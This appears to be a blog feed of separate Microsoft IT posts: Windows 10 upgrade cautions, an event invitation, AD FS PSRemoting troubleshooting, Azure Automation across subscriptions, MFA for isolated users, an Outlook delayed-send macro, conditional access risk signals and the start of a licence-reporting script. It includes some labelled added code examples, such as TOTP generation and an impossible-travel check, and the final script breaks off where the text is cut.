With this I do not mean to advise against third-party encryption tools; I simply want to make you aware that, when they are present, a series of pre and post actions is needed for the build upgrade to succeed.

Third-party antivirus

A point of attention similar to the BitLocker one... Since antivirus products work in close contact with the operating system, it is always necessary to make sure you have the correct version of the antivirus before upgrading Windows 10.

The danger is that the build upgrade does not complete correctly because the antivirus recognizes it as a malicious action, or that the antivirus no longer works correctly once the Feature Update is complete.

In any case it is always better to check your antivirus vendor's web page, or contact them, to find out whether there are known issues (it does not happen often, but when it does you could lose time).

Using Windows Defender as the antivirus you typically have no problems, since it is part of the operating system being upgraded.

Delta updates

At the time of writing this article, the ability to upgrade builds by placing in the device cache only the files that have been changed/added between one build and the next is under development. This is estimated to save at least 35% of the update size.

The release of this feature is planned with the Fall Creators Update, that is the next build expected in September 2017.

Conclusions

Windows as a Service introduces decidedly new concepts for enterprises, simplifying workstation management and continuously adding features that can follow users' needs in terms of use and protection of their device.

Two builds are released per year; they do not represent a new operating system but a very close derivation of the previous one, where application compatibility with the past is meant to be preserved.

The installation of both Quality and Feature updates can be made easier by the differential and content-sharing mechanisms.

Time to network: invitation to the "Women Think Next" event on 30 May 2017 at the #OfficemitWindows


Women are still underrepresented in leadership positions: the higher the management level, the lower the share of women. And this despite studies showing that female leaders have a positive influence on corporate culture and success. These circumstances have been known for years. So do we really still need to talk about it?

Our answer to this question is a clear and loud: Yes! That is why Microsoft launched the "Women Think Next" initiative. It offers female senior professionals from various industries the opportunity to share experiences at regular networking events held worldwide, to meet other great and inspiring women and, above all, to make new contacts.

We believe in the power of networks and role models and would like to warmly invite you to discuss the changes in the world of work with us under the umbrella theme #worklifeflow: What new demands arise from technological and cultural change for organizations, employees and managers? What opportunities and challenges does digitalization offer women in the world of work in particular?

When? 30 May 2017, from 18:00
Where? Microsoft Deutschland, Walter-Gropius-Str. 5, München-Schwabing

The speakers at the event include:

The programme at a glance:

18:00 Admission
18:30 Opening by Dr. Christine Haupt, General Manager Services & Diversity Champion, and Markus Köhler, Senior Director HR, Microsoft Deutschland
18:40 Keynote by Inga Höltmann, followed by Q&A
19:30 Snacks, drinks & networking
20:00 Breakout sessions on the topics

  • Digital Leadership
  • Networking
  • Digital Workstyle
  • Growth Mindset

From 21:00 Networking

In parallel you will also have the opportunity to get to know our Smart Workspace concept in Microsoft's new German headquarters on a guided tour, or to try out future technologies such as the Microsoft HoloLens, the Surface Studio and other innovations on site yourself.

Would you like to attend? Register here. We look forward to seeing you!


A post by Maren Michaelis
Communications Manager Employer Branding

PSRemoting for Office 365 AD FS Configuration


When configuring AD FS for Office 365, one of the final steps is to link Azure AD with the on-premises AD FS deployment.  This should occur only after AD FS and WAP servers have been fully deployed, verified and tested.

When linking the AD FS infrastructure with Office 365, we must use the Azure AD PowerShell module.  We need to point the module at the primary AD FS server using the Set-MsolADFSContext cmdlet, if the module is not executed locally on the primary AD FS server.

If everything just worked, there would be no need for this blog post and life would be far less interesting.  One of the requirements is that the AD FS server has PSRemoting enabled.  If PSRemoting is not enabled, a firewall blocks it, or the WinRM service is not running, you will not be able to complete the required configuration.

The below screenshots illustrate the observed behaviour if we run into PSRemoting issues.

Note that the AD FS servers require Internet access on TCP 80 and 443 to connect to Azure AD and complete the configuration.  TCP 80 is required for Certificate Revocation List checks and TCP 443 is for the actual service communication.

Lab Configuration

In this lab we have AD FS 2016 deployed.  All of these machines are part of the same AD Domain in the same forest.  We are logged on as a domain admin account so we do not have to worry about security assignment issues in this post.  We can focus on the PSRemoting aspect.

On the primary AD FS server, the WinRM service was deliberately stopped.  This is shown in the PowerShell window below.

WinRM Service Stopped - Status Shown In PowerShell

To prove that the server is not listening on the regular PSRemoting ports, we check using netstat.  Note that no services are listening on TCP 5985 or TCP 5986.

Primary AD FS Server Hostname Shown - Netstat Unable to Enumerate PSRemoting Ports

 

Authentication Prompt Due to PSRemoting Denied

What happens if we now go to a remote machine and try to point the Azure AD module at this AD FS server using the Set-MsolADFSContext cmdlet?  In the example below note that the server name is the same hostname which was displayed above: ADFS-2016-1.wingtiptoys.ca.

Set-MsolADFSContext -Computer ADFS-2016-1.wingtiptoys.ca

Set-MsolADFSContext - Unexpected Password Prompt

Oh – that did not end well.  We got an authentication prompt.  How come?  We are logged on as a domain administrator account, and you can see that the PowerShell instance is running as administrator.

Even if you correctly enter the credentials into the prompt, the command still fails.  This is most likely due to PowerShell remoting NOT being enabled on the server that the -Computer parameter specifies.  In our case the server: ADFS-2016-1.wingtiptoys.ca.

To troubleshoot the issue, we can review the Azure AD Module’s log file.  This is located in:

%USERPROFILE%\Documents\MicrosoftOnline

The below is an excerpt from the log file.  The highlighted line indicates that we are unable to connect to the primary AD FS server on TCP 5985.

5/14/2017 4:05:26 PM    Runspace Connection info: Scheme:http Port:5985, AuthenticationType:Default Uri:ADFS-2016-1.wingtiptoys.ca AppName:wsman, Shell:http://schemas.microsoft.com/powershell/Microsoft.PowerShell
5/14/2017 4:05:26 PM    Connection Uri: http://ADFS-2016-1.wingtiptoys.ca:5985/wsman/
5/14/2017 4:05:26 PM    Opening runspace to ‘http://adfs-2016-1.wingtiptoys.ca:5985/wsman/’
5/14/2017 4:05:47 PM    System.Management.Automation.Remoting.PSRemotingTransportException: Connecting to remote server adfs-2016-1.wingtiptoys.ca failed with the following error message : WinRM cannot complete the operation. Verify that the specified computer name is valid, that the computer is accessible over the network, and that a firewall exception for the WinRM service is enabled and allows access from this computer. By default, the WinRM firewall exception for public profiles limits access to remote computers within the same local subnet. For more information, see the about_Remote_Troubleshooting Help topic.
at System.Management.Automation.Runspaces.AsyncResult.EndInvoke()
at System.Management.Automation.Runspaces.Internal.RunspacePoolInternal.EndOpen(IAsyncResult asyncResult)
at Microsoft.Online.Identity.Federation.Powershell.PowerShellSession.VerifyAndReconnectRunSpacePool()

Authentication Prompt Due to Incorrect AD FS Server Name

Another cause for unexpected authentication prompts when using the Set-MsolADFSContext cmdlet is a typo in the specified AD FS server name.

AD FS Service Running On Primary AD FS Server - ADFS-2016-1.Wingtiptoys.ca

Note that the WinRM service is running on the primary AD FS server.  The server's FQDN is also displayed: ADFS-2016-1.  Note though that in the command below an incorrect name will be used.

The "AD" in the server name was transposed.  This is to demonstrate what will happen if the wrong name is used.

Set-MsolADFSContext -Computer AFDS-20161.wingtiptoys.ca

Unexpected Authentication Prompt When Configuring AD FS With Office 365 - OOPS Type In Server Name

Note that the big red arrow indicates that the authentication request specifies the wrong server name AFDS-2016-1.  The characters are transposed.

Enabling or Disabling PSRemoting Access Denied

In current versions of Windows we have the Disable-PSRemoting and Enable-PSRemoting cmdlets.  On one AD FS 2016 lab system, I was not able to run these commands.  They would both generate an access denied error.

Disable-PSRemoting and Enable-PSRemoting Cmdlets - Access Denied

For the search engines:

Disable-PSRemoting -Force
WARNING: Disabling the session configurations does not undo all the changes made by the Enable-PSRemoting or
Enable-PSSessionConfiguration cmdlet. You might have to manually undo the changes by following these steps:
1. Stop and disable the WinRM service.
2. Delete the listener that accepts requests on any IP address.
3. Disable the firewall exceptions for WS-Management communications.
4. Restore the value of the LocalAccountTokenFilterPolicy to 0, which restricts remote access to members of the
Administrators group on the computer.
remove-item : Access is denied.
At line:69 char:21
+ …                   remove-item -path “$securityIDPath” -recurse -force
+                       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo          : NotSpecified: (:) [Remove-Item], InvalidOperationException
+ FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.PowerShell.Commands.RemoveItemCommand

new-item : Access is denied.
At line:74 char:21
+                     new-item -path “$securityPath” -Sddl $sddl -force
+                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo          : NotSpecified: (:) [New-Item], InvalidOperationException
+ FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.PowerShell.Commands.NewItemCommand

PS C:\>
PS C:\> Enable-PSRemoting -Force
remove-item : Access is denied.
At line:69 char:21
+ …                   remove-item -path “$securityIDPath” -recurse -force
+                       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo          : NotSpecified: (:) [Remove-Item], InvalidOperationException
+ FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.PowerShell.Commands.RemoveItemCommand

Looking at the access denied errors in Sysinternals' Process Monitor we can see that there were issues writing to the registry.

Sysinternal Process Monitor - Filter to Show Access Denied Only

Specifically this was under the key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Microsoft.Windows.Internal.ADFS

PSRemoting should be enabled by default on current Windows builds.  This should be verified prior to installing AD FS.
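As an added example (not part of the original post), the checks walked through above can be scripted and run before handing the server to the Azure AD module. Test-AdfsRemotingPrereq is a hypothetical helper written here; the server name is the lab's.

```powershell
# Added example, not the post's code: verify the PSRemoting path that
# Set-MsolADFSContext depends on (name resolution, TCP 5985, WS-Man, WinRM service).
function Test-AdfsRemotingPrereq {
    param([Parameter(Mandatory)][string]$AdfsServer)

    $result = [ordered]@{ Server = $AdfsServer }

    # 1. Name resolution: a transposed hostname (AFDS instead of ADFS) fails here,
    #    before any credential prompt, which is a clearer signal than the prompt.
    try {
        $rec = Resolve-DnsName -Name $AdfsServer -ErrorAction Stop |
               Where-Object { $_.Type -in 'A', 'AAAA' } | Select-Object -First 1
        $result.Resolved = $rec.IPAddress
    } catch { $result.Resolved = $null }

    # 2. Is TCP 5985 (WinRM over HTTP, the port shown in the module's log) reachable?
    $result.Port5985Open = (Test-NetConnection -ComputerName $AdfsServer -Port 5985 `
                            -WarningAction SilentlyContinue).TcpTestSucceeded

    # 3. Does the WS-Management listener answer an identify request?
    try {
        $null = Test-WSMan -ComputerName $AdfsServer -ErrorAction Stop
        $result.WsManAnswers = $true
    } catch { $result.WsManAnswers = $false }

    # 4. WinRM service state via WMI over DCOM, which does not itself depend on WinRM
    try {
        $svc = Get-WmiObject -Class Win32_Service -Filter "Name='WinRM'" `
                             -ComputerName $AdfsServer -ErrorAction Stop
        $result.WinRMService = "$($svc.State) (start mode $($svc.StartMode))"
    } catch { $result.WinRMService = 'WMI query failed' }

    $result.Ready = [bool]($result.Resolved -and $result.Port5985Open -and $result.WsManAnswers)
    return [pscustomobject]$result
}

# Only point the Azure AD module at the server once every check passes.
$check = Test-AdfsRemotingPrereq -AdfsServer 'ADFS-2016-1.wingtiptoys.ca'
$check | Format-List
if ($check.Ready) {
    Set-MsolADFSContext -Computer $check.Server
} else {
    Write-Warning 'Resolve the failed checks (server name, WinRM service, firewall exception for TCP 5985) before running Set-MsolADFSContext.'
}
```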

Cheers,

Rhoderick


Using Azure Automation with Multiple Subscriptions


Azure Automation is very useful for almost every Azure administrator, but it can be challenging to figure out how to run a process across multiple subscriptions. Below we'll walk through the steps to run a PowerShell runbook across multiple subscriptions, with the assumption that the automation account already exists in one subscription. For information on how to create an automation account, see here. The other assumption is that we are working with Resource Manager, not Classic deployments.

Once we have our automation account the high level steps are as follows:
1. Find the ApplicationID of the RunAS connection
2. Grant that applicationID the appropriate permissions in the other subscriptions (in my example, I’m giving it subscription level contributor access).
3. Set the appropriate context during runbook execution.

When an Azure Automation account is created it asks whether a "RunAs" account should be created and defaults to 'yes'. If you keep the defaults, you'll have a connection asset in the automation account called "AzureRunAsConnection". This connection asset is really a Service Principal in Azure AD.
RunAs Connection

Copy the “ApplicationID” of the AzureRunAsConnection to the clipboard and grant it rights to any subscriptions you want to manage with your central automation account. In this example, I’ve given it contributor rights at the subscription level, but you could certainly use more granular permissions here or scope it to a specific resource group.

Automation Account Subscription Level Permissions

Now I just need to write my runbooks in such a way that they'll use the connection asset and select the appropriate subscription. The following code sample runs from a subscription called 'sub1' and creates a new resource group in a subscription named 'sub2'. You'll need to update the certificate thumbprint in this script by retrieving it from the Assets > Certificates blade in the automation account.



# Connection asset created with the automation account (ApplicationID, TenantID, thumbprint)
$Conn = Get-AutomationConnection -Name AzureRunAsConnection

# Paste the thumbprint from the automation account's Assets > Certificates blade
# (the connection asset also carries it as $Conn.CertificateThumbprint)
$Thumbprint = '<your thumbprint>'

# Sign in as the RunAs service principal
Add-AzureRmAccount -ServicePrincipal -Tenant $Conn.TenantID -ApplicationId $Conn.ApplicationID -CertificateThumbprint $Thumbprint

# Subscriptions the service principal has been granted access to
$sub = Get-AzureRmSubscription

# Switch context from the automation account's home subscription (sub1) to sub2
Select-AzureRmSubscription -SubscriptionName 'sub2'
$rg = 'testrg'
New-AzureRmResourceGroup -Name $rg -Location westus2


Implementing Multi Factor Authentication in Challenging Environments


Your password probably starts with a capital letter and ends with either a number or an exclamation mark.  You probably reuse passwords across multiple sites, many of which have been compromised.  Due to the weakness of traditional user names and passwords, Multi Factor Authentication has exploded in popularity over the past several years as customers look to reduce their exposure.

Deploying Azure MFA is usually very straightforward.  If you don't want users to receive text messages, that's fine.  The MFA admin selects which methods of communication are allowed and, during registration, the user selects the preferred option from the list.  Most users have access to broadband or Wi-Fi and can answer the second factor of authentication with the appropriate response.

But what if they can't?  What if your user is in an isolated environment and cannot be reached?  What are some options to authenticate these cowboys?

This blog introduces three options for addressing this scenario. We can accommodate the isolated user with a "Time-Based One-Time Password" (TOTP) solution.  Codes are generated locally by combining a secret key with the current timestamp using a cryptographic hash function to generate a one-time password.  The user enters these codes as a second factor of authentication and life is good.

 

The easiest solution for the isolated user is to deploy the Microsoft Authenticator application. The Microsoft Authenticator app can receive notifications both over cellular and Wi-Fi connections. In addition, the application can generate access codes locally. These codes don’t require internet or data, so you don’t have to worry about having phone service to sign in, or that the app will use up your data plan. When you close the app, it doesn’t keep running in the background so it won’t drain your battery. You can close the app and ignore it until the next time that you sign in.

The Microsoft Authenticator app works across all platforms and accomplishes the goal of allowing the user to enter the current code into the verification window in an isolated environment.

 

The second solution involves deploying an on-prem Azure Multi-Factor Authentication Server.  This solution ties into our Azure MFA service to provide MFA auth to a subset of on-prem resources, specifically ADFS, RADIUS, and IIS.  This process involves importing third-party Open Authentication (OATH) time-based, one-time password (TOTP) tokens, and then using them for two-step verification. For example, a customer could utilize ActiveIdentity tokens, which are OATH TOTP tokens whose secret key was imported into the Azure Multi-Factor Authentication Server.

OATH TOTP tokens support the following formats:

  • Portable Symmetric Key Container (PSKC)
  • CSV, if the file contains a serial number, a secret key in Base 32 format, and a time interval
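As an added example (not from the original post), this PowerShell code shows what the MFA Server and the token both compute from an imported record: it decodes a Base32 secret from a CSV row of the shape described above and derives the RFC 6238 TOTP code. The CSV column names and the token record are constructed; the secret is the published RFC 6238 test key.

```powershell
# Added example, not the post's code: TOTP (RFC 6238 over HMAC-SHA1, RFC 4226)
# from a PSKC-style CSV record (serial number, Base32 secret, time interval).
function ConvertFrom-Base32 {
    param([Parameter(Mandatory)][string]$Base32)
    $alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ234567'
    $bits = [System.Text.StringBuilder]::new()
    # Each Base32 character carries 5 bits; padding '=' carries none
    foreach ($ch in $Base32.ToUpperInvariant().TrimEnd('=').ToCharArray()) {
        $idx = $alphabet.IndexOf($ch)
        if ($idx -lt 0) { throw "Invalid Base32 character '$ch'" }
        [void]$bits.Append([Convert]::ToString($idx, 2).PadLeft(5, '0'))
    }
    $bytes = [System.Collections.Generic.List[byte]]::new()
    for ($i = 0; $i + 8 -le $bits.Length; $i += 8) {
        $bytes.Add([Convert]::ToByte($bits.ToString($i, 8), 2))
    }
    return ,$bytes.ToArray()
}

function Get-TotpCode {
    param(
        [Parameter(Mandatory)][byte[]]$Secret,
        [Parameter(Mandatory)][long]$UnixTime,
        [int]$Interval = 30,
        [int]$Digits = 6
    )
    # The moving factor is the number of whole intervals since the Unix epoch,
    # encoded as an 8-byte big-endian counter and keyed-hashed with the secret.
    $counter = [long][math]::Floor($UnixTime / $Interval)
    $counterBytes = [BitConverter]::GetBytes($counter)
    if ([BitConverter]::IsLittleEndian) { [array]::Reverse($counterBytes) }
    $hmac = [System.Security.Cryptography.HMACSHA1]::new($Secret)
    $hash = $hmac.ComputeHash($counterBytes)
    # Dynamic truncation: the low nibble of the last byte selects a 4-byte window
    $offset = $hash[$hash.Length - 1] -band 0x0F
    $binary = (($hash[$offset] -band 0x7F) -shl 24) -bor
              ($hash[$offset + 1] -shl 16) -bor
              ($hash[$offset + 2] -shl 8) -bor
              $hash[$offset + 3]
    $code = $binary % [math]::Pow(10, $Digits)
    return ([int]$code).ToString().PadLeft($Digits, '0')
}

# Constructed token record in the CSV shape described above (column names assumed)
$tokenCsv = @'
SerialNumber,SecretKey,TimeInterval
SAMPLE-0001,GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ,30
'@
$token  = $tokenCsv | ConvertFrom-Csv
$secret = ConvertFrom-Base32 -Base32 $token.SecretKey

# Self-check against the RFC 6238 SHA-1 test vector (T = 59 s gives 94287082, so 287082 at 6 digits)
$vector = Get-TotpCode -Secret $secret -UnixTime 59 -Interval ([int]$token.TimeInterval)
if ($vector -ne '287082') { throw "TOTP implementation does not match RFC 6238 (got $vector)" }

# The code the token (and the MFA Server holding the same imported secret) shows right now
$now = [long][DateTimeOffset]::UtcNow.ToUnixTimeSeconds()
Get-TotpCode -Secret $secret -UnixTime $now -Interval ([int]$token.TimeInterval)
```

Because both sides derive the code from the shared secret and the clock alone, the only thing the MFA Server needs from the import is that secret and interval; clock drift between token and server is the usual cause of rejected codes.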

 

 

Lastly, third-party MFA solutions and their various flavours of OTP can be leveraged from within ADFS.  Once installed and registered with ADFS, it is possible to enforce MFA as part of the global or per-relying-party authentication policy.  The following solutions are all supported with ADFS:

  • Gemalto: Gemalto Identity & Security Services
  • inWebo Technologies: inWebo Enterprise Authentication service
  • Login People: Login People MFA API connector for AD FS 2012 R2 (public beta)
  • Microsoft Corp.: Microsoft Azure MFA
  • RSA, The Security Division of EMC: RSA SecurID Authentication Agent for Microsoft Active Directory Federation Services
  • SafeNet, Inc.: SafeNet Authentication Service (SAS) Agent for AD FS
  • Swisscom: Mobile ID Authentication Service and Signature Services

Tip o’ the Week 379 – Delay mail, revisited


A couple of years ago, ToW #282 covered how to delay your mail from being sent, by forcing Outlook to work offline, by selectively delaying individual messages or even adding a rule to ensure that every one is held up. It's a very useful thing to do, sometimes: a great way to prevent accidental mail sending, or to give you a chance to revise stuff you've sent after maybe reading newer emails in your inbox.

This tip presents a refinement of the process as there is a downside to automatically delaying everything – namely, if you’re in a hurry to go somewhere but you need a mail to be fired off beforehand, it can be annoying to have to hang around for the enforced delay to expire before you can safely pack up and head out.

You will need to do a bit of digging around inside Outlook dialogs, so it may help to park this on a 2nd screen, copy to a Word doc or something…

What we’re going to do is set up a rule to delay all outgoing email – except mail with a particular category assigned to it, so that will be sent immediately. If you know you want the mail you’re about to send to go right now, then you could manually set the category before you hit send, and it will leave straight away.


  1. Go into Rules in the main Outlook window (either from the menu, or just search for Rules in the “Tell me what you want to do” box), and select the Manage Rules & Alerts option.
  2. To create a new rule to delay mail (if you've already got one as per ToW #282, then edit it to do the same) try adding one that applies to messages you send, then don't choose any conditions (and accept that it will fire on all messages), then when asked for exceptions, set a condition so that it won't apply if a particular category is set (eg create a Category called NODELAY or SENDNOW or something). The categorisation will still be visible in your Sent Items folder, but the recipient won't see it.
  3. Set the delay time (in minutes) and apply the rule; try it out with a blank, uncategorised mail to yourself and you should see it sit in the Outbox folder for a few minutes before being sent. Now try to send another message and set the category manually, and you should see it arrive quickly. To set the category on an outgoing message, look in the message properties before hitting send, either from the Tags group in the ribbon, or File | Properties on the menu of the message window.

This is all very well if you remember to go in and set the category before you hit send. If you regularly have an Outbox full of stuff waiting to go and you're truly adventurous, you could add a Macro to Outlook to automatically flush the queue. Press ALT+F8 to get to the Macro settings; if prompted to run or create a macro, create a new one called SendNow and paste the following into the code window:

Sub sendNow()
    ' Remember where the user was, then switch the explorer to the Outbox
    Set CurrentFolder = Application.ActiveExplorer.CurrentFolder
    Set Application.ActiveExplorer.CurrentFolder = _
        Application.GetNamespace("MAPI").GetDefaultFolder(olFolderOutbox)
    Set omsgs = Application.ActiveExplorer.CurrentFolder.Items
    ' Walk the collection backwards: each Send removes the item from the Outbox,
    ' so a forward For Each loop would skip every second message
    For i = omsgs.Count To 1 Step -1
        Set omsg = omsgs.Item(i)
        ' A delivery time in the past cancels any deferred delivery...
        omsg.DeferredDeliveryTime = Now() - 1
        ' ...and the category exempts the message from the delay rule
        If omsg.Categories = "" Then omsg.Categories = "NODELAY"
        omsg.Send
    Next
    Set Application.ActiveExplorer.CurrentFolder = CurrentFolder
End Sub

After saving/exiting from the Macro editor, you might want to add a shortcut to your new macro to the Quick Access Toolbar in the main Outlook window. When you add the command to the list on the right hand side of the dialog, you can modify the button to give it a snazzier icon and a name that means something.

Breaking down EMS Conditional Access: Part 3


This post is the third of a three-part series detailing Conditional Access from Microsoft Enterprise Mobility + Security. Today we are re-publishing the third installment with the white paper Protect your data at the front door with conditional access.

Through this blog series, we’ve taken a closer look at conditional access with Enterprise Mobility + Security and the innovations that can help you define and inform your policies with different layers of controls for user/location, applications, and devices. Most of the scenarios we’ve discussed have addressed user-based vulnerabilities, but it’s important to take into consideration the broader threat landscape and its complex risks.

Risk-based conditional access

Although attacks are increasingly sophisticated, each one leaves revealing traces, a calling card. This data can be used to find patterns that will help us protect against attacks. But processing such tremendous volume is no small task—so we got to work. Every month we update more than 1 billion PCs, service more than 450 billion authentications, and analyze more than 200 billion emails for malware and malicious websites. We see just about every kind of attack there is, and we push the data directly into our Microsoft Intelligent Security Graph.

The graph pulls together all of the telemetry and signals that come in from the hundreds of cloud services operated by Microsoft, extensive and ongoing research, and data from partnerships with industry leaders and law enforcement organizations. This graph is unique to Microsoft. We apply our machine learning and data analytics to identify suspicious and anomalous activities that characterize modern sophisticated attacks. The graph makes it possible for us to deliver recommendations and automated actions that protect, detect, and respond across different attack vectors.

You can use the Microsoft Intelligence Graph to inform your conditional access policies to protect against risk events by blocking access when risk is detected.

Leaked credentials

Microsoft security researchers search for credentials that have been posted on the dark web, which usually appear in plain text. Machine learning algorithms compare these credentials with Azure Active Directory credentials and report any match as “leaked credentials.”

Impossible travel or atypical locations

Machine intelligence detects when two sign-ins originate from different geographic locations within a window of time too short to accommodate travel from one to the other. This is a pretty good indicator that a bad actor succeeded in logging on.

Machine intelligence also flags sign-ins at atypical locations by comparing them against past sign-ins of every user. Sign-ins from familiar devices or sign-ins from or near familiar locations will pass.
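As an added example (not from the original post, and not Azure AD's actual algorithm), here is the shape of an "impossible travel" check run over constructed sign-in records: two sign-ins for the same user are flagged when the implied speed between them exceeds what any flight could achieve. The record format, coordinates and the 900 km/h threshold are assumptions for this illustration.

```powershell
# Added example, not the post's code: flag sign-in pairs whose implied travel speed is impossible.
function Get-GreatCircleKm {
    param([double]$Lat1, [double]$Lon1, [double]$Lat2, [double]$Lon2)
    # Haversine distance on a 6371 km sphere
    $toRad = [math]::PI / 180
    $dLat = ($Lat2 - $Lat1) * $toRad
    $dLon = ($Lon2 - $Lon1) * $toRad
    $a = [math]::Sin($dLat / 2) * [math]::Sin($dLat / 2) +
         [math]::Cos($Lat1 * $toRad) * [math]::Cos($Lat2 * $toRad) *
         [math]::Sin($dLon / 2) * [math]::Sin($dLon / 2)
    return 6371 * 2 * [math]::Atan2([math]::Sqrt($a), [math]::Sqrt(1 - $a))
}

function Find-ImpossibleTravel {
    param(
        [Parameter(Mandatory)][object[]]$SignIns,   # objects with User, Time, Lat, Lon, City
        [double]$MaxKmh = 900                        # assumed ceiling: faster than a commercial flight
    )
    $SignIns | Group-Object User | ForEach-Object {
        $events = @($_.Group | Sort-Object Time)
        for ($i = 1; $i -lt $events.Count; $i++) {
            $prev = $events[$i - 1]; $cur = $events[$i]
            $km    = Get-GreatCircleKm $prev.Lat $prev.Lon $cur.Lat $cur.Lon
            $hours = ($cur.Time - $prev.Time).TotalHours
            # Two distant sign-ins at the same instant count as infinitely fast
            $kmh = if ($hours -gt 0) { $km / $hours } else { [double]::PositiveInfinity }
            if ($km -gt 0 -and $kmh -gt $MaxKmh) {
                [pscustomobject]@{
                    User       = $_.Name
                    From       = $prev.City
                    To         = $cur.City
                    DistanceKm = [math]::Round($km)
                    Hours      = [math]::Round($hours, 2)
                    ImpliedKmh = [math]::Round($kmh)
                }
            }
        }
    }
}

# Constructed sample sign-ins: alice appears in Seattle and then London one hour
# later (flagged); bob travels Seattle to Portland over five hours (plausible).
$sample = @(
    [pscustomobject]@{ User='alice'; Time=[datetime]'2017-05-14T08:00:00Z'; Lat=47.61; Lon=-122.33; City='Seattle'  }
    [pscustomobject]@{ User='alice'; Time=[datetime]'2017-05-14T09:00:00Z'; Lat=51.51; Lon=-0.13;   City='London'   }
    [pscustomobject]@{ User='bob';   Time=[datetime]'2017-05-14T08:00:00Z'; Lat=47.61; Lon=-122.33; City='Seattle'  }
    [pscustomobject]@{ User='bob';   Time=[datetime]'2017-05-14T13:00:00Z'; Lat=45.52; Lon=-122.68; City='Portland' }
)
Find-ImpossibleTravel -SignIns $sample | Format-Table -AutoSize
```

A production version would also have to allow for VPN egress points and shared corporate IP ranges, which is why the post pairs this signal with the familiar-device and familiar-location checks rather than acting on distance alone.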

Sign-ins from potentially infected devices

The Microsoft Intelligent Security Graph maintains a list of IP addresses known to have been in contact with a bot server. Devices that attempt to contact resources from these IP addresses are possibly infected with malware and are therefore flagged.

Sign-ins from anonymous IP addresses

People who want to hide their device’s IP address, often with malicious intent, frequently use anonymous proxy IP addresses. A successful sign-in from an anonymous IP address is flagged as a risky event. If the risk score is medium, a risk-based conditional access policy can require MFA as additional proof of identity.

Sign-ins from IP addresses with suspicious activity

Multiple failed sign-in attempts that occur over a short period of time, across multiple user accounts, and that originate from a single IP address, also trigger a risk event. Traffic patterns that match those of IP addresses used by attackers are a strong indication that accounts are either already compromised or will be very soon, although the traffic pattern may also originate from an IP address shared with multiple devices via a router or similar device.

Beyond access control

Microsoft Enterprise Mobility + Security (EMS) delivers innovative security technologies that provide a holistic, identity-driven approach to mobility, identity, and security in a mobile-first, cloud-first world.

While our risk-based conditional access helps protect your data “at the front door,” EMS also gives you visibility into user, device, and data activity on-premises and in the cloud, and includes solutions that allow you to protect your corporate data from user mistakes with stronger controls and enforcement.

 

To get a full picture of conditional access from EMS, download our white paper today.

Office 365 License Details with PowerShell – With Domain, License (SKU id) or Product, and Service Status Filters


By: Anshuman Mansingh, Technology Specialist, Microsoft Corporation, https://www.linkedin.com/in/anshumanmansingh/

 

I have often come across this requirement where I am asked for a custom report that returns the following.

  1. A division of licenses based on domains
  2. Types of licenses assigned

 

Fortunately, we have Microsoft Excel that can do much of the filtering – if we can export a list of all the details required above. And so, I wrote two PowerShell scripts.

Please find them at the end of this article.

Note: This script has been designed for information retrieval and does not change anything on Office 365. Also, it is not covered under Microsoft support – please treat this as a sample.

 

Outputs

Script – Version 1

Script Version 1 Output:

This script will locate the desktop folder and write a comma-delimited CSV file there. This file can be opened in Notepad. However, to make better sense of it, you can open it in MS Excel and then press "Ctrl + T" (and select "My table has headers") to format the output as a table.


Once converted to a table, you can click on the small drop-down (down-arrow) buttons next to each column-head to filter the table as you need.

 

References on dealing with CSV data in Excel

  1. Formatting as a table

Columns in the output CSV:

  1. Display Name
  2. User Principal Name
  3. Each SKU or License-type (in the tenant) has a column in the CSV

     

Below is a sample.


 

Script Version 1 Time Taken:

This script reports the time taken. Below are some test numbers for the time taken to connect to Office 365, retrieve data, analyse it and export it to a CSV file.

8000 users – 2 minutes 13 seconds

20000 users – 6 minutes 28 seconds


This looks like an acceptable time investment considering the once-in-a-month-type nature of the report.

However, the time taken increases with increasing user base and slower connection and is dependent on the client system configuration.

 

Script – Version 2

Script Version 2 Output:

This script will locate the desktop folder and write multiple comma-delimited CSV files there.

(You can format and filter these CSVs as tables, as explained above in the output description for script version 1.)

 

Columns in the first CSV:

  1. Display Name
  2. User Principal Name
  3. Each SKU or License-type (in the tenant) has a column in the CSV

 

Columns in the second CSV:

  1. Display Name
  2. User Principal Name
  3. Each Office 365 Service (in the tenant) has a column in the CSV

     

Below is a sample from the second CSV


 

Script Version 2 Time Taken:

The script returns the value of time taken.

8000 users – 2 minutes 31 seconds

20000 users – 6 minutes 48 seconds

    

 

Steps to Run

Step 1:

Only for the first run: Prepare PowerShell to run Office 365 related scripts.

  • Open Windows PowerShell as an administrator
  • Run the command: Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
  • Confirm “Yes” or “Yes to All” when prompted.
  • Close PowerShell Window.

 

Step 2:

Only for the first run: Download and install the necessary PowerShell modules.

 

Step 3:

Only for the first run:
Ready the script

  • Copy the script on to notepad.
  • Save the file as a “.ps1” file on the desktop.

 

Step 4:

Running the script – There are two options.

  1. Action Item: Starting the script

    Option 1: Right click on the .ps1 file and click on “Run with PowerShell”

    Option 2: Open Windows PowerShell > Type in the path of the file at the prompt (e.g. "c:\users\anshuman\script.ps1") > hit the Enter key.

  2. Action Item: The script will prompt for credentials. Please enter your Office 365 Global Administrator credentials.
  3. Wait & Watch: The script will then keep you waiting as it starts to connect and retrieve users.


     

  4. Wait & Watch: It will then start reading into each user’s licensing information. And while it does that, you will see a progress bar.


  5. Wait & Watch: Once the processing is over, this script is going to write the licensing information to a CSV file and place it on your desktop.

 

Script Version 1

 

#Editables
$NameOfOutputFile_LicenseDetails = "LicenseStats.csv"
$NameOfOutputFile_Errors = "Errors.csv"
$PathOfOutputFiles = [Environment]::GetFolderPath("Desktop")

#ErrorsRefreshed
$Error.Clear()

#Prompts for Office 365 Administrator Credential
if (!$cred) { $cred = Get-Credential -Message "Office 365 Global Administrator Credentials" }

$TimeFlag1 = (Get-Date) #First Time Flag

#Initiates Remote PowerShell connection
